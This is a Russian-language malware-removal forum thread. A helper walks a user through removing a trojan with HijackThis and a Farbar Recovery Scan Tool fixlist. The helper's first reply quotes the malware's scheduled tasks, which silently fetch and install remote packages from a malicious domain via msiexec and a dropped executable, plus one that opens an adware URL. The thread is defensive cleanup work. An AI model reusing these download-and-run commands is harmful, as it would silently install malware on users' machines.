Помогите вылечить Trojan:Win32/Azden.A!cl

**Legich43** · 03.12.2018, 21:20

Защитник Windows 10 определяет Trojan:Win32/Azden.A!cl
Затронутый файл: file: C:\Program Files (x86)\Common Files\Ext Directory Entry\28225\chrome_watcher.dll
Симптомы: С периодичностью в 10-15 минут появляется окно с ошибкой "не найден файл chrome_watcher.dll". Затем открывается браузер или вкладка (если браузер уже открыт) с казино или каким-то сериалом.
Логи прилагаются.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 03.12.2018, 21:22

Уважаемый(ая) Legich43, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 03.12.2018, 22:06

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки :

Код:

O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: {6224C8E1-711E-D767-815C-8CBD5D26D301} - C:\Windows\system32\msiexec.exe /q -package https://siyxmoner.com/77e29mnhh33b.ovy
O22 - Task: {CECAC918-2C59-6DD7-31A3-FFE05D849E50} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://myxeneurt.net/cl/?guid=h1fdn8ld4lbr795ugijsguhbl1wn3a8b&prid=1&pid=4_1257_0
O22 - Task: {F8143D1D-19B7-011D-4098-AFC8BDD7366B} - C:\Program Files (x86)\JEes.exe /q /i https://siyxmoner.com/rgzwfplkjmij.jry

Перезагрузите систему.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**Legich43** · 04.12.2018, 00:56

Пофиксил, просканировал

**Vvvyg** · 04.12.2018, 07:10

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(ICEpower) C:\Windows\System32\ICEsoundService64.exe
Virustotal: C:\Windows\system32\ICEsoundService64.exe
R2 ICEsoundService; C:\Windows\system32\ICEsoundService64.exe [807808 2018-10-03] (ICEpower)
Virustotal: C:\Windows\system32\DRIVERS\AdminService.exe
C:\Windows\system32\ICEsoundService64.exe
2018-12-01 21:57 - 2018-12-01 21:57 - 000000000 ____D C:\ProgramData\boost_interprocess
2017-09-29 16:42 - 2017-09-29 16:42 - 000059904 _____ (Microsoft Corporation) C:\Program Files (x86)\JEes.exe
2017-09-29 16:42 - 2017-09-29 16:42 - 000059904 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\mpuuDfAey.exe
2018-12-02 15:48 - 2018-12-02 15:48 - 006161408 _____ () C:\Users\Олег\AppData\Local\dump007.dat
2018-11-27 17:57 - 2018-11-27 17:57 - 000072704 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw32_s1eo.dll
2018-11-27 18:05 - 2018-11-27 18:05 - 000072704 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw32_s4u4.dll
2018-11-27 17:58 - 2018-11-27 17:58 - 000072704 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw32_s678.dll
2018-11-27 18:08 - 2018-11-27 18:08 - 000072704 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw32_s7is.dll
2018-11-27 17:58 - 2018-11-27 17:58 - 000084992 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw64_s4es.dll
2018-11-27 17:59 - 2018-11-27 17:59 - 000084992 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw64_s53c.dll
2018-11-27 18:08 - 2018-11-27 18:08 - 000084992 _____ () C:\Users\Олег\AppData\Local\Temp\rldfw64_s9r8.dll
FirewallRules: [{8DFA2190-0D60-4951-AF3B-AA1ED1605097}] => (Allow) C:\Users\Олег\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe
FirewallRules: [{59061DC2-D421-44C6-9899-53332179E702}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{CE118A92-A8FC-4314-ABD3-DEA7731854FF}] => (Allow) C:\Program Files (x86)\JEes.exe
FirewallRules: [{22799AF3-E6C0-4F24-A349-9BF791D67915}] => (Allow) C:\Program Files (x86)\Common Files\mpuuDfAey.exe
FirewallRules: [{3C2AA032-6BB4-41BA-B433-BD78E716478F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E5AE2046-A46F-40F1-A419-70D5AC74B5CD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C79DA20A-2FBB-439F-B2BE-65A763420923}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{10354B50-06FB-4D72-A7F7-EC26E55981CC}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FC149163-568A-44B4-80CA-12733477BABE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CE607F72-103D-4F04-B3C2-99D3B99488DE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{11814B3B-13AC-46A5-BD34-C2993B97A897}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CCF64E3A-51E6-416E-8CF1-9230D25C946B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5592F039-4AB6-4B09-B2AE-3EE6E444C21F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{541451DF-C977-4C15-BF99-E56BF6B24C36}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1809C208-D7E4-4754-BE1E-056BBD8CA1E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8BF00A95-224B-47CE-8984-7C82FAA2EC5E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9BDD0081-296D-4438-A348-D68289ABABDB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{19DC8535-4BFD-4F8C-B38C-E5E56F645A06}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{89C30D0E-8B69-4523-A77C-AFC63E396A88}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{559F17A7-B37D-4C49-8451-2C8AEBAEC8EA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0FE68D13-1810-4137-8779-0C7CF757056F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B93D3769-5FE0-40A8-ACAB-6730F35395DE}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
Folder: C:\Program Files (x86)\Common Files\Ext Directory Entry\28225
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры,
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сделайте лог Malwarebytes AdwCleaner.

**Legich43** · 04.12.2018, 11:35

Сделал

**Vvvyg** · 04.12.2018, 21:43

Что с проблемой сейчас?

**Legich43** · 04.12.2018, 23:32

Все прошло, спасибо большое!

**Vvvyg** · 05.12.2018, 06:54

Запустите AdwCleaner, меню Настройки - Удалить AdwCleaner - выберите Удалить.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Помогите вылечить Trojan:Win32/Azden.A!cl (заявка № 221052)

Опции темы